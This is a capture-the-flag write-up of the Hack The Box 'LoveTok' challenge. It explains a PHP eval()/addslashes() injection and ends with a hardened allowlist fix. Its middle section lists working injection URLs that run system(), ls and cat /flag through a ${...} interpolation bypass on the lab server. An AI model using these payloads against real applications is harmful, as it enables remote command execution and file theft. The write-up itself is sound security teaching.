Love-Tok Write up HTB

Last updated on May 5th, 2024 at 12:06 pm

Description:

True love is tough and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛

Go to Hack The Box and click on Start Instance.

It gives the host address.

Paste the host address into the browser to open the challenge page.

If we click the “Nah, that doesn’t work for me. Try again!” button, a new time is shown. However, we notice that the URL has changed: “?format=r” has been appended.

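http://134.122.106.163:30222/?format=r

The challenge source code shows where that parameter goes. The controller reads it from the query string and passes it to TimeModel:

<?php
class TimeController
{
    public function index($router)
    {
        // User-controlled query parameter; defaults to 'r' when absent
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

The first payload:

http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system(ls);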

Because the 1 parameter is one we define ourselves and it is read inside eval(), its value is evaluated by the eval() call in the challenge source code and does not pass through the addslashes() function, at least not directly. So we can use quotes in that self-referenced parameter, in the following way:

http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system('ls%20../');

ls command on / directory

http://134.122.106.163:30222/?format=${print(`cat /flag*`)}

or

http://134.122.106.163:30222/?format=${system($_GET[1])}&1=cat+/flagIVmuX

FLAG : HTB{wh3n_l0v3_Redacted_p0pp1ng}

Conclusion:

There are various ways to bypass an addslashes() restriction filter when user input is passed to the PHP eval() function. There might even be a broader attack surface, as the addslashes() bypass described above might be applicable to other kinds of attacks in some specific cases, such as SQL injection or command injection.
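On the defending side, the fix is to stop building PHP source from the format string at all. The class below is an added example, not the challenge's code: it assumes, as this write-up describes, that TimeModel escapes the format with addslashes() and hands it to eval(). HardenedTimeModel, FORMAT_ALLOWLIST and the '+1 day' offset are hypothetical, and it needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. HardenedTimeModel and
// FORMAT_ALLOWLIST are hypothetical names; '+1 day' is a placeholder offset.
final class HardenedTimeModel
{
    // Letters (date() format characters or literals) and plain separators only.
    // Excludes $ { } ( ) quotes, backticks and backslashes outright.
    private const FORMAT_ALLOWLIST = '~\A[A-Za-z \-:/.,]{1,32}\z~';

    private string $format;

    // mixed, because ?format[]=x makes $_GET['format'] an array.
    public function __construct(mixed $format)
    {
        $ok = is_string($format)
            && preg_match(self::FORMAT_ALLOWLIST, $format) === 1;
        // Reject and fall back to the default instead of trying to escape.
        $this->format = $ok ? $format : 'r';
    }

    public function getFormat(): string
    {
        return $this->format;
    }

    public function getTime(): string
    {
        // The format reaches date() as data. No PHP source is built from it,
        // so there is nothing for string interpolation to expand.
        return date($this->format, strtotime('+1 day'));
    }
}

// Constructed sample inputs: two valid formats, two rejected strings, one array.
$samples = ['r', 'Y-m-d H:i:s', '${anything}', 'Y"x', ['r']];
foreach ($samples as $input) {
    $model = new HardenedTimeModel($input);
    printf("%-16s => format %-12s => %s\n",
        json_encode($input), $model->getFormat(), $model->getTime());
}
```

The allowlist is defence in depth; removing eval() is what closes the hole, since addslashes() escapes quotes and backslashes but leaves $, { and } untouched.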

Thanks For Reading

Happy Hacking !!!
